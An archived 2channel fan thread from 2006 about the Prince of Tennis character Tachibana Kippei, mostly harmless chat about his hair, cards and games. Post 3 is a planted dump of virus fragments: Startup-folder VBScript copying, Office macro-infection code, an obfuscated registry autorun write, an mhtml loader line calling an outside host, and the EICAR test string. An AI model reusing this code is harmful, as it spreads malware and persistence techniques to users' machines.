2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ポン・デ・】テニプリの黒髪金髪橘桔平に萌えるスレ2【ライオン】

1 :川'A`川:2006/11/12(日) 18:54:22 ID:8DEgnjEv
前スレ落ちたので立てました。
黒髪金髪と変化していく橘さんを皆でマターリ愛でましょう。
荒らしは徹底ヌルー

前スレ↓
【とりあえず】テニプリ 橘桔平に萌えるスレ【拝んどけ】
http://c-au.2ch.net/test/-/cchara/1148029047/n

2 :名無しかわいいよ名無し:2006/11/12(日) 18:58:44 ID:8DEgnjEv
とりあえず橘さんドキサバ同梱カードおめでd!

3 :<body onload=window()>:2006/11/12(日) 20:35:14 ID:Qf2VBjdB
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


4 :名無しかわいいよ名無し:2006/11/12(日) 20:56:58 ID:AidKCFyo
橘さんスレも復活か、面白くなってきたばい

5 :名無しかわいいよ名無し:2006/11/13(月) 18:03:20 ID:CyghzAC7
>>1さん乙ですばい!

橘さんスレ復活おめでとうございます(*´∀`*)
ドキサバ同梱カードも気になるよ橘さん

6 :名無しかわいいよ名無し:2006/11/15(水) 13:08:16 ID:I6B+FyIv
>>1さん乙!!

7 :名無しかわいいよ名無し:2006/11/16(木) 16:36:14 ID:0BSUekBh
風邪ひきました。
おかゆが食べたいです橘さん

8 :川'A`川:2006/11/17(金) 00:49:48 ID:ja/3ez7h
一応ageときますよ橘さん

9 :名無しかわいいよ名無し:2006/11/17(金) 10:21:07 ID:GxxhdYrv
神尾スレが無くなってたよ橘さん!

10 :名無しかわいいよ名無し:2006/11/18(土) 00:03:05 ID:65MAdSar
復活してたんだね

無性に九州行きたいよ橘さん

11 :名無しかわいいよ名無し:2006/11/18(土) 00:04:04 ID:LQ+nPUmx
まとめて面倒見るばい!!

12 :名無しかわいいよ名無し:2006/11/18(土) 01:24:30 ID:HlTVUdYR
↑…と心強いお言葉があったところで神尾の件。
最近圧縮ぶり(落としっぷり)がすごいし原作も当分燃料無さそうだし
でもゲーム出たりとかもあるし、どうだろう?

13 :名無しかわいいよ名無し:2006/11/18(土) 08:46:37 ID:F1H42a+o
ここをスレなし不動峰キャラ総合にする?

14 :名無しかわいいよ名無し:2006/11/18(土) 19:49:30 ID:8Ayn8FNk
>>13
峰話するのは良いと思うけどあくまで橘さん個人萌えスレなので

15 :名無しかわいいよ名無し:2006/11/18(土) 21:53:04 ID:dbmG331l
>>14
わかった

ドキサバの橘さんは結局黒髪坊主か?どっちでも良いが
一瞬だけあった金髪版のやつはなんだったんだろう

16 :名無しかわいいよ名無し:2006/11/19(日) 00:16:27 ID:vAcT3zSj
カードハンターは黒髪・金髪どっちも見られるんですか、橘さん?

17 :名無しかわいいよ名無し:2006/11/20(月) 21:16:25 ID:o5f3Ei0F
かわいいスレタイだな

18 :名無しかわいいよ名無し:2006/11/21(火) 20:37:30 ID:zRFU98Jf
質問だけど、獅子学ユニフォームって何色だっけ?
カラーで描かれてるの何かあったっけ

19 :名無しかわいいよ名無し:2006/11/22(水) 13:22:44 ID:vCO6QdsG
アニプリだけど。

乾が持ってた獅子学時代の橘さんの写真では
微妙な緑がかった水色に、黒のラインだったと思います。


20 :名無しかわいいよ名無し:2006/11/22(水) 21:09:23 ID:wNpFW+lL
そんなんだありがとう
オクとか探しても橘さんのグッズや画像って少ないorz

21 :名無しかわいいよ名無し:2006/11/25(土) 00:01:30 ID:4vMnGPKK
橘さんOVAでは髪がもっさりしてきてたよ!

22 :名無しかわいいよ名無し:2006/11/25(土) 22:01:12 ID:9fhVIcSX
>>21
台詞あった?あるなら見てみようかな

23 :名無しかわいいよ名無し:2006/11/26(日) 00:39:20 ID:eV/G3Dyw
>>22残念ながら全くないよ…orz
ただ金髪でもっさりだったからワロタw
菊丸が手振ってたw

24 :名無しかわいいよ名無し:2006/11/26(日) 20:42:03 ID:+ja86FSF
そうか…しかし金髪もっさりは気になる
菊丸は何気に不動峰を構ってくれるなあ

25 :名無しかわいいよ名無し:2006/11/26(日) 21:14:44 ID:cMwa5c7b
何年も間あいてるのにまたタッチー言ってたしね
(↑これはむしろたしけが覚えてたことに驚き)
「やばいよ!〜」ってマジで応援してくれてる風だったし。

ただ実際同じチームの同学年だったら橘さんタイプは苦手っぽい気もする。

26 :名無しかわいいよ名無し:2006/11/27(月) 00:30:29 ID:gmH7wTsk
確かにw
でも橘さんが皆に好かれてると嬉しくなるよw

27 :名無しかわいいよ名無し:2006/11/27(月) 22:47:47 ID:+Esji1t5
ドキュン顧問の目撃者なので不動峰には割と同情的なのかも
まあ峰に限らず他校にちょっかい出すのは菊丸な気もするけど

28 :名無しかわいいよ名無し:2006/11/28(火) 19:34:11 ID:EjlVaOUl
学プリもお化け屋敷来てくれたね菊丸
橘さんはお化けやらないんですかw

29 :名無しかわいいよ名無し:2006/11/30(木) 00:09:56 ID:KLXGWJCF
ST2が好きだなやっぱり
ケンカ慣れを匂わすイベントがあったな
誕生日イベが電話のみなのが寂しかった

30 :名無しかわいいよ名無し:2006/11/30(木) 23:32:04 ID:pvHDy2vs
橘さん、石田鉄の誕生日祝ってやってください

31 :名無しかわいいよ名無し:2006/12/02(土) 16:59:59 ID:GGTWvT59
橘さん新しいカードに居るかな…?

32 :名無しかわいいよ名無し:2006/12/05(火) 00:21:47 ID:H2YPuigW
>>31
新しいカードって?小波のサイト見に行ってもわからなかった。
思えば普通のテニスのユニフォームのカードしか見た事ないな。
私服とかコスプレとか


33 :名無しかわいいよ名無し:2006/12/07(木) 19:13:18 ID:MbDibH95
>>32
TCGの四天宝寺の実力とかってやつ
買ってないけど峰の他キャラがいたから橘さんもいるのかと思って

ドキサバ今月か楽しみノシ

34 :名無しかわいいよ名無し:2006/12/09(土) 15:07:45 ID:EDnCFRNx
早く魚とり行きたいですよ
峰は伊武と神尾以外背景でもいないんだろうか

35 :名無しかわいいよ名無し:2006/12/11(月) 21:00:59 ID:MjZCud/C
保守

36 :名無しかわいいよ名無し:2006/12/12(火) 15:38:07 ID:jkQYlkbw
カードハンターのジャケに金髪橘さんが!
SD橘さんカワユスwww

37 :名無しかわいいよ名無し:2006/12/14(木) 14:26:57 ID:EB2xC20+
ドキサバまであと1週間

38 :名無しかわいいよ名無し:2006/12/17(日) 20:02:10 ID:Ul7Ch7S5
今日ドキサバの試遊してきたノシ
橘さんに早く会いたいです橘さん

39 :名無しかわいいよ名無し:2006/12/18(月) 00:55:28 ID:/QpLJQmC
ゲーム試遊した時に貰えるカードってどんなのでした?

40 :名無しかわいいよ名無し:2006/12/18(月) 18:33:12 ID:2qEICZWF
>>39
いつもの事だけどクリスマスブロマイドの使い回し柄
橘さんは居ないよ

41 :名無しかわいいよ名無し:2006/12/19(火) 08:59:20 ID:MCGFn2xI
今週の本誌で銀兄さんの試合が始まった

ギャラリーの中に弟が居ないか、
必死で探している

42 :名無しかわいいよ名無し:2006/12/19(火) 22:42:59 ID:AE3fLr5P
弟ラヴ
幼少の頃の回想キボン

43 :名無しかわいいよ名無し:2006/12/19(火) 23:44:42 ID:FvcZublS
アニメ絵の橘さんの金髪はもう少し何とかならないんだろうか
明るい黄色一色ってのは…

44 :名無しかわいいよ名無し:2006/12/20(水) 17:29:35 ID:/t4eRXS0
>>43
確かにwあれじゃ遠くから見たらトウモロコシに見えるよwww

45 :名無しかわいいよ名無し:2006/12/25(月) 00:34:20 ID:+kfdb6D7
橘さんステッカーガムに居たよノシ
相変わらず黄色金髪だけどカワユス

46 :名無しかわいいよ名無し:2006/12/27(水) 12:17:20 ID:r+FUVcMI
土器鯖攻略スレに橘さん絡みのミニドラマパスが2つもww

47 :名無しかわいいよ名無し:2006/12/27(水) 13:27:52 ID:S3AYgkq2
ドキサバの橘さんはエロいな

48 :名無しかわいいよ名無し:2006/12/27(水) 21:21:18 ID:NimA0b92
エロいんですか!?
学プリをコンプしてから買おうと思っていたのに…
やりたくなってきました。

49 :名無しかわいいよ名無し:2006/12/29(金) 16:29:23 ID:+kEdWIK+
今の橘さんがポンデライオンになったら
顔の周りにコーンが生えた状態になるんだろうか。

10 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)